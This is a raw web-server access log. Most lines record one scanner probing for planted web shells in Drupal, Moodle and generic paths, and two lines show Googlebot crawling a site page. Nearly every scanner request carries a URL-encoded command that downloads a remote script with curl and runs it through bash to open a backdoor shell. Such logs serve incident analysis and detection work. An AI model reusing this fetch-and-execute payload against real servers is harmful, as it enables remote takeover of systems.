68.183.183.85 - - [14/Apr/2025:13:34:41 +0300] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:34:44 +0300] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:04 +0300] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:07 +0300] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:16 +0300] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:22 +0300] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:30 +0300] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:35 +0300] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:44 +0300] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:49 +0300] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:02 +0300] "GET /?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 0 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:08 +0300] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
66.249.66.19 - - [14/Apr/2025:13:36:18 +0300] "GET /site/?pg=%E0%B8%A3%E0%B8%A7%E0%B8%A1%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%95%E0%B8%97%E0%B8%B8%E0%B8%81%E0%B8%84%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B9%83%E0%B8%99%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B9%80%E0%B8%94%E0%B8%B5%E0%B8%A2%E0%B8%A7%2B%E0%B8%9D%E0%B8%B2%E0%B8%81%E0%B8%96%E0%B8%AD%E0%B8%99%2B%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%A1%E0%B8%B5%2B%E0%B8%82%E0%B8%B1%E0%B9%89%E0%B8%99%E0%B8%95%E0%B9%88%E0%B9%8D%E0%B8%B2 HTTP/1.1" 200 73908 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.183.183.85 - - [14/Apr/2025:13:34:33 +0300] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
66.249.66.17 - - [14/Apr/2025:13:34:39 +0300] "GET /site/?pg=%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%95+%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A+%E0%B8%99%E0%B8%AD%E0%B8%81+%E0%B9%81%E0%B8%95%E0%B8%81+%E0%B8%87%E0%B9%88%E0%B8%B2%E0%B8%A2 HTTP/1.1" 200 73578 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.183.183.85 - - [14/Apr/2025:13:34:48 +0300] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
